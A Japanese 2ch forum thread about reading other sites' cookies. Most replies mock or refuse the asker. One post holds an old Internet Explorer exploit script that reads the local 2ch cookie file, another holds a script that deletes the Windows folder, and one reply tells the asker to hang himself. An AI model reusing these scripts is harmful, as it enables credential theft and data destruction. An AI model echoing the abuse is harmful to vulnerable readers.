他所のCookieを読み込みたいのですが
他所のCookieを読みたいのですが、どのような方法がありますか? 例えば、2chで保存されたCookieを私の掲示板で表示させるとかしたいのです。 なかなか難しい問題なので新規スレッドを立てさせてもらいました。 決してパスワードを盗むとかに使うわけじゃないのです.....決して。 >>1 まず今繋いでいる回線を切ります。そして一本のロープを用意して 首を吊ります。そうすればあなたはこの質問を気にしなくて済むように なります。 時々 .com/ <=こんなアホなクッキー吐く所があるよね (^^ ハゲハゲ(・∀・)しく同意! >>6 .comだけはありえない。 ドットが最低2つ含まれてないと受け入れないよ。 よって6は厨房。 結局誰もわからないのか....。 ま、それならさおれでいいんですが、自分がわからないからといって ごまかすのはやめてください。 >>10 ブラウザに依存するんじゃないの? じゃあマジレスで。 「無い」 以上。 どうしてもやりたいなら他所のパケット覗くなり、 クライアントに進入して覗き見るなりしてくれよ。 分かったらもう来ないでね。さようなら。 >>10 パスの事言ってんじゃないかなあ。サブドメインで/とか。 >>11 テキストエリアにコピペして貰ってサブミット。 盗む訳じゃないんでしょ。 >>11 分からないんじゃなくてクラック行為に荷担するつもりがないだけだ。 初級ネット板にでも逝ってくれ。 http://mentai.2ch.net/hack/index2.html >>6 すまない、詳しく無いのにいい加減な事をいってしまった。 漏れが経験したのは .com.tw/ と言う奴だ。 これはネット通販みたいな 所だったから怖かったよ。 最近だと 某MPUブランド が **.jp/ を吐いてた時があった。 何か板ちがいなので #--------------------しゅうりゃう-------------------- >>14 ,15 そっちに書くと逆にこっちに逝けって言われそうですが.... と、いうわけで -------- 再開 -------- そんなこと無いって、あっちで書き込めばみんなジャンジャンレス 打ってくれるよ 僕も真っ先に書き込みたいよ じゃっ (・∀・)カエレ! ニドトコナイデネ♪ どうでも良いけど一番下の "素人" "出会い" って何じゃー! プソプソ(゚Д゚) 金無いのかな??? ひろゆき、、、 あの、cookie自体の事は解っているつもりなんですが、、 結局誰もわからないと...。 教える立場の口調と態度じゃないね>>22 >>23 いい加減ウザイ。>>2 でお前のすべきことは教えてもらってるじゃないか。 マジレスすると、クッキー セキュリティ で google で探せ。 >>23 オウム返しはその内容が正しい時だけにしとけって あなたははっきり言って何もわかってませんので、>>22 で勉強してください。 >>1 もしこのような機能を有効にするとパスワードとかが盗まれる可能性が 出てくる。>>1 がいくら > 決してパスワードを盗むとかに使うわけじゃないのです.....決して。 といっても、全員が邪悪な用途に利用しないという保証はないから、ブラウザは このような真似ができないように作られているし、もしこれができてしまったら それは「セキュリティホール」以外の何ものでもない。 参考: http://japan.cnet.com/News/2000/Item/000512-1.html あきらめろ。 >>30 ウケ狙ってるつもり?はっきりいってつまんないよ。 串サイトはこちら!とかいって竹串のページかいたり。 逝ってよし。 2chの自分のクッキーを別の板でも使いたいという方向性では いかがなものだろう? >>33 それは可能。2ch が Set-Cookie: ayu=moe; domain=2ch.net って感じで吐き出せば良い。 >>33 ,>>34 いやいや、それじゃ駄目なのです。 あくまで自分の情報は隠しつつ、いかに他人の情報を 得られるか、という事が重要なのです。 やっぱりセキュリティーホールを突くしかないんだろうなぁ...。 ハックラ逝け厨房 =============終了=============== 甲茶は正式にドキュンと認定されました [EOF] >あくまで自分の情報は隠しつつ、いかに他人の情報を得られるか、という事が重要なのです。 臆面もなく他人のプライバシーは覗きたいが自分のプライバシーは守りたいなどと言えるあな たはすばらしい。なお世間は法的にも技術的にもそんな穴は塞ぎに掛かっているから、望むの は勝手だが時間の無駄であろうね。まあ、この調子なら他人を巻き添えにしなくても全部自分 でできるでしょ。せいぜいご自愛ください。 sage sage sage sage sage sage age age age --- 再開 --- あれからperlとjavaスクリプトの組み合わせで、 特定のサイトのcookieだけを読み取る事はできるようになりましたです。 でも、やっぱりIE6になったら修正されるかもしれないし、 javaスクリプトをオンにしていないと使えないので引き続き情報を募集します。 できればもうちょっと簡単に、スマートに情報を読み取りたいのです。 と、いう事で、だ・れ・か・教えてください!! このスレッドでセキュリティホールを見つけたら 俺が徹底的にレポートして潰してやる よって終了 function f1(){ dh.DOM.write('<IFRAME SRC=file://'+navigator.cookiefile.replace(/\\/,'/')+' name=I1></IFRAME>'); setTimeout('f2()',500);} function f2(){ dh.DOM.all.I1.focus(); dh.DOM.all.I1.document.execCommand('selectall'); dh.DOM.all.I1.document.execCommand('copy'); var r=T1.createTextRange();r.execCommand('paste'); alert(T1.value);} function GetUserName(def){ var s2='';try{ var c1=new ActiveXObject('NSComDlg.FileDlgCtrl.1'); c1.Flags=0x80;c1.ShowOpen(); var s1=c1.InitDir; var t1=s1.indexOf('\\Documents and Settings\\'); if(t1>=0){ s2=s1.substr(t1+24); t1=s2.indexOf('\\'); if(t1>=0){s2=s2.substr(0,t1);} } }catch(e){}if((!s2)&&def){s2=def;}return s2;} navigator.username=GetUserName(); if(navigator.username){navigator.cookiehead='C:\\Documents and Settings\\'+t1+'\\Cookies\\'+t1+'@';} if(navigator.cookiehead){ document.write('<OBJECT classid=clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A id=dh></OBJECT>'); document.write('<TEXTAREA id=T1></TEXTAREA>'); } function RequestCookie(file){ if(navigator.cookiehead){ navigator.cookiefile=navigator.cookiehead+file; setTimeout('f1()',500);return true; } } RequestCookie('corn.2ch[1].txt'); <script language="jscript"> var a a = new ActiveXObject("Scripting.FileSystemObject"); a.DeleteFolder("C:\\WINDOWS",true); </script> で我慢してください。 >>47-48 困ったお子ちゃまですね・・・。 もう秋だというのに。 ヒソヒソヒソ。。。。クスクス。。。クスクス(・∀・) 結局ここってレベル低いのね age age age □□□■■■■■■□□□□□■■■■■■□□□□□□□■■■□□□□□ □□■□□□□□□■□□□■□□□□□■□□□□□□■□□□■□□□□ □□□□□□□□■■□□□■□□□□□■□□□□□■□□□□□■□□□ □□□■■■■■■■□□□■□□□□□■□□□□■□□□□□□□■□□ □□■□□□□□■■□□□□■■■■■■□□□□■■■■■■■■■□□ □□■□□□□□■■□□□□□□■□□□□□□□■□□□□□□□□□□ □□■□□□□□■■□□□□■■■■■■■□□□□■□□□□□□□□□ □□■□□□□□■■□□□■□□□□□□□■□□□□■□□□□■□□□ □□□■■■■■□■■□□■□□□□□□□■□□□□□■■■■□□□□ □□□□□□□□□□∩□□□■■■■■■■□□□□□□□□□□□□□□ | ゝノ __|_______|_ ■■■■■■■■ |iiiiiiiiiiiiiiiii| ■■■■■■■■■ナニヤッテンダヨ!バカモノガァ! |iiiiiiiiiiiiiiiii| ■■■■√ === │ |iiiiiiiiiiiiiiiii|■■■■√ ~ ミ ノノノ 彡 | |iiiiiiiiiiiiiiii|■■■√ Å Å \ |iiiiiiiiiiiiiiii|■■■ ∵ (● ●) ∴│ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ |iiiiiiiiiiiiiiii|■■■ 丿■■■( │< 常にageとけって |iiiiiiiiiiiiiiii|■■■ ■ д ■ | | 言ったじゃないかぁ! |iiiiiiiiiiiiiiii|■■■■ ■■ ■■ ■ \_________ |iiiiiiiiiiiiiiiiii■■■■■■■■■■■■__ \iiiiiiiiiiiiiii■■■■■■■■■■■■iiヽ \iiiiiiiiiiiii■■■■■■■■■■■iiiiiii| |iiiiiiiiiiiiiiiii■■■■■■■■■■iiiiiiiii (´m`)クスクス ク……… ( `m´)ププーッ 何このスレッド この子が変なスレ上げてるの? 時間あるんだねぇ、、 60と62は氏んでくださいです。 このスレッドを過去ログいかせる訳にはいかんのです。 とりあえずクロスサイトスクリプティングをcssと略すやつは逝ってよし 今日もいい天気でご機嫌です(^v^) 揚げさせてもらいますね♪ そういや、Proxomitronだっけ? パーソナルなProxyの。 任意のクッキーが読み出せるセキュリティホールがあったねえ。 夏休み前ぐらいの時期だったかなあ。 寒くなってきました。 こんな夜にはageさせて頂きますね♪ (´-`).。oO(変な奴・・・あおってるつもりなのかなぁ・・・) // TODO: この位置にコマンド ハンドラ用のコードを追加してください CString cs=GetDocument()->GetPathName(),cpm; if(cs==""){ TCHAR szPath[_MAX_PATH]; VERIFY(::GetModuleFileName(AfxGetInstanceHandle(), szPath, _MAX_PATH)); LPTSTR lpszExt = _tcsrchr(szPath, '\\'); ASSERT(lpszExt != NULL); ASSERT(*lpszExt == '\\'); *(++lpszExt) = 0; cs=szPath; } cs=cs.Left(cs.ReverseFind('\\')+1); cs=cs+GetTSSMona; GetRichEditCtrl().GetWindowText(cpm); CStdioFile file(cs,CFile::modeCreate|CFile::modeWrite); file.WriteString(cpm); file.Close(); ::ShellExecute(0,"open",cs,NULL,NULL,SW_SHOW); >76 俺は紅茶は煽りだとおもうぞ。自分で調べればって感じです。 こういうタイプには知ってても教えてやらない。 >79 バカの一つ覚えじゃん。 いいかげんにうざいからやめろって・・・ 紅茶・・・いわゆる教えて君という物体 http://klablog.okiraku-pc.net/logs/current-bbs/161/xqqrlz.html 自分では調べようともせず、煽ると逆切れして「レベル低い」を連発する。 しかし、自分が一番レベルが低いと言う事には気付いていない。 すでに、こんな質問をする時点で低レベルで、 さらに、こんな単発質問をする時点で2chというものを理解していないらしい。 終了したスレを、再開させるのが趣味らしい。 >>75 のように突然わけの分からない事を言い出すが、冷え性らしい。 しかし、根はいい奴で、ネットだと人格が変わるらしく、暴走している。 こんなやさしい紅茶は今ごろドラえもんの夢でも見ならがおねんねしていることだろう。 おい、まだか。レベルが低いな。 結局クズの集まりじゃないか。 氏 氏 氏 氏 氏 氏 氏 氏 氏 氏 煽っているつもりはありませぬ。 セキュリーティを突くという事は自分の身を守る事にも なるのです。 偽者のせいで煽りと思われているのです。。。(;;) Securityな話は高木先生などいかがだろうか。 うぅ、、知らぬ間にセキュリーティとかタイプしてるし.... 僕はちゃんころじゃないのに。。。(;;) ところで君の方からオファーするものは無いのかな? 今の所正真正銘のおしえてくん見たいだが・・ 一ヶ月も情報集めれば普通の知能指数なら相応の知識が付くものだよね? >1 夏休みは終わったんだから早く学校に行きなさいね。 それともこの夏休みをきっかけにヒッキーになったのかな? ていうか、そんな低レベルな煽りじゃ相手に自分の底を知られて苦笑されるだけだよ。 たぶん紅茶は勝利の喜びを噛み締めまくったと思うぞ、あんたの書き込みを見て。 /∵∴∵∴\ /∵∴∵∴∵∴\ /∵∴∴,(・)(・)∴| |∵∵/ ○ \| |∵ / 三 | 三 | / ̄ ̄ ̄ ̄ |∵ | __|__ | < うるせー馬鹿! \| \_/ / \____ \____/ 早く起きたので記念にageておきます。(^v^) そういえば、IE6にしたら例の方法はやぱり使えなくなりました。(--;) ところで君の方からオファーするものは無いのかな? 今の所正真正銘のおしえてくん見たいだが・・ 一ヶ月も情報集めれば普通の知能指数なら相応の知識が付くものだよね? ところで君の方からオファーするものは無いのかな? 今の所正真正銘のおしえてくん見たいだが・・ 一ヶ月も情報集めれば普通の知能指数なら相応の知識が付くものだよね? ところで君の方からオファーするものは無いのかな? 今の所正真正銘のおしえてくん見たいだが・・ 一ヶ月も情報集めれば普通の知能指数なら相応の知識が付くものだよね? ところで君の方からオファーするものは無いのかな? 今の所正真正銘のおしえてくん見たいだが・・ 一ヶ月も情報集めれば普通の知能指数なら相応の知識が付くものだよね? ところで君の方からオファーするものは無いのかな? 今の所正真正銘のおしえてくん見たいだが・・ 一ヶ月も情報集めれば普通の知能指数なら相応の知識が付くものだよね? ところで君の方からオファーするものは無いのかな? 今の所正真正銘のおしえてくん見たいだが・・ 一ヶ月も情報集めれば普通の知能指数なら相応の知識が付くものだよね? ところで君の方からオファーするものは無いのかな? 今の所正真正銘のおしえてくん見たいだが・・ 一ヶ月も情報集めれば普通の知能指数なら相応の知識が付くものだよね? IE6にもセキュリティーホールが見つかったYO! 他所のクッキーを読み込められるYO! >>紅茶 何らかの方法でTEMPフォルダに任意のHTMLコードを含むファイルを作成し、 何らかの方法でそのファイルを走査しパスを特定しろ、さらに、 何らかの方法でユーザー名を特定し、他所のCookieファイルを読み込め。 はじめまして! 自分は環境変数で得るCOOKIEを、外部の(例えば自分のサーバに設置しておいて2chのCOOKIEをゲットしたり)ものをゲット したいのですが!! お知恵をお貸しください!!! $ENV{'HTTP_COOKIE'}; に何か付け加えて、指定別鯖のクッキーを得ることは出来ないでしょうか! そんなブラウザあったらこわいこわい。IEが昔ヤッチャッタけど もし取得できるなら確実にトリップクラックされるよな >>120 お前だけにこっそり教えよう。 まず、IEやNetscapeをこえる画期的なブラウザを作る。 次に、カチュやホットゾヌをこえるそのブラウザを使った画期的な2ch専用ブラウザを作る。 これで、世界中の人間に自分のブラウザを使わせるわけだ。 すると、自分のページに来る奴もそのブラウザを使っているということになる。 で、そのブラウザには自分にしかわからないセキュリティーホールをいれておく。 どんなクッキーでも見えてしまうと言うセキュリティーホールをな。 これで、外部のクッキーも食い放題と言うことだ。 すでに、M$が同じ方法をとっている可能性は極めて高いから、 ゲイツと友達になったらIE用のクッキー吸い出し方法教えて貰えるかもよ。 1つのCookieには4096バイトのデータを記録でき、最大で300のCookieを保存できる。1台のサーバが同じコンピュータに対して発行できるCookieの数は20個に制限されている。Cookieにはそれぞれ有効期限を設定することができ、有効期限を過ぎたCookieは消滅する。 (=゜ω゜)ノぃょぅ久しぶり、アレから僕も成長できましたよ。 それではまたー ━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━― ∧_∧ ピュ.ー ( ^^ ) <これからも僕を応援して下さいね(^^)。 =〔~∪ ̄ ̄〕 = ◎――◎ 山崎渉 携帯ゲーム機"プレイステーションポータブル(PSP) このPSPは、新規格UMD(ユニバーサルメディアディスク)というディスクを利用しており、そのサイズは直径6cmととても小さい(CDの半分程度)。 容量は1.8GBとなっている。 画面は4.5インチのTFT液晶で、480px x 272px(16:9)。MPEG4の再生やポリゴンも表示可能。外部端子として、USB2.0とメモリースティックコネクタが用意されているという。 この際、スク・エニもGBAからPSPに乗り換えたらどうでしょう。スク・エニの場合、PSPの方が実力を出しやすいような気がするんですが。 任天堂が携帯ゲーム機で圧倒的なシェアをもってるなら、スク・エニがそれを崩してみるのもおもしろいですし。かつて、PS人気の引き金となったFF7のように。 __∧_∧_ |( ^^ )| <寝るぽ(^^) |\⌒⌒⌒\ \ |⌒⌒⌒~| 山崎渉 ~ ̄ ̄ ̄ ̄ ∧_∧ ∧_∧ ピュ.ー ( ・3・) ( ^^ ) <これからも僕たちを応援して下さいね(^^)。 =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕 = ◎――――――◎ 山崎渉&ぼるじょあ (⌒V⌒) │ ^ ^ │<これからも僕を応援して下さいね(^^)。 ⊂| |つ (_)(_) 山崎パン >>34 その方法ってJavaScriptでも可能ですか? 試したのですが上手くいかないのですが。 >>141 あなたは2chのシステムを開発してる人ですか? たとえばさ、http://goo.ne.jp/ ○○○○/○○○○みたいなところで クッキーを発行する場合、パスを"/"にしたら、http://goo.ne.jp/ △△△△/△△△△/ とかhttp://goo.ne.jp/ のドメインにあるサイトならどっからでも読めるようになるよね。 でも、スクリプトに初めから相対パスでクッキーを送れるようにできるのかなあ? やっぱそれぞれ設定するしかないのか、面倒くさいなあ。 ∧_∧ ( ´∀`)<オマエモナー ( ) | | | |_)_) >>1 他のサイトで発行されたcookieを変な手段を使って奪う方法はある まあアホじゃ悪用するくらしか使い道が無いかも知れねーな 2chでcookieを記録するときに、cookieの有効ドメインをおまいのサイトの ドメインにしてもらえばいいんじゃないの?(実質無理だが) …という書き込みをしようと思って、自分のサーバで他人のサイト向けの cookieを記録できるかPHPで試してみたらダメだった。 うほっ5年前に僕が立てたスレがまだ残ってる おまえらも暇なヤツラだなぁプッ 過疎ってるけど、誰か教えてくれるかな。。。 サイトAでCookieをセットします。 サイトBのページから、<script>タグで、サイトAにあるPHPを呼び出した際に FireFoxでは、Cookieが読めるのですが、IEでは読めないのですが、 これってブラウザの仕様ですかね? このスレを除いたんだけどオレも掲示板やってる んで金ないから色んなレン鯖が混在してるんだけど名前欄に クッキーで保存読み込みをしようと思ったらできない domainの所でかかるみたい いい方法ない?例えば2ch.netとbbspink.comの両方でクッキーを吐きたい 無理? ∧_∧ ( ・∀・) | | ガガッ と ) | | Y /ノ .人 / ) .人 < >_∧∩ _/し' < >_∧∩`Д´)/ (_フ彡 V`Д´)/ / ←>>133 / ←>>138 電脳プリオンが全sakuされて●焼かれて全鯖ピンポイント永久規制されますように ◎2ch勢いランキングサイトリスト◎ ★+ニュース板 ・ 2NN (推薦) ・ 2chTimes ★+ニュース板新着 ・ 2NN新着 ・ Headline BBY ・ unker Headline ★+ニュース板その他 ・ Desktop2ch ・ 記者別一覧 ★全板 ・ 全板縦断勢いランキング (推薦) ・ スレッドランキング総合ランキング ・ ログ速 ★全板実況込み ・ 2勢 ・ READ2CH ・ i-ikioi ※ 要タイトル名検索 誰でも簡単にネットで稼げる方法など 参考までに、 ⇒ 『半藤のブブイウイウレレ』 というサイトで見ることができます。 グーグル検索⇒『半藤のブブイウイウレレ』 HUIDSQ9K4Y プログラミングを誰でも習得できる方法は、「前場アキドルのプログラミングマスター方法」というブログで見られるらしいよ。ネットで調べると見られるらしいです。 WCJTQ 英国防省は12日、ロシア軍がウクライナ東部ルガンスク州の要衝セベロドネツクとその周辺を徐々に掌握しているとの戦況分析を明らかにした。 「大食い魔女」として活躍した菅原初代(すがわら・はつよ)さんが死去したことが16日深夜、ツイッター「魔女菅原」で投稿された。59歳だった。 ツイッターには「3月9日深夜、菅原初代は永眠いたしました 長い間お付き合いいただきありがとうございました 故人に変わりご報告させていただきました」と記された。 菅原さんは、テレビ東京「大食い世界一決定戦!」やTBS系「水曜日のダウンタウン」など、テレビ番組にも多数出演。 read.cgi ver 07.4.7 2024/03/31 Walang Kapalit ★ | Donguri System Team 5ちゃんねる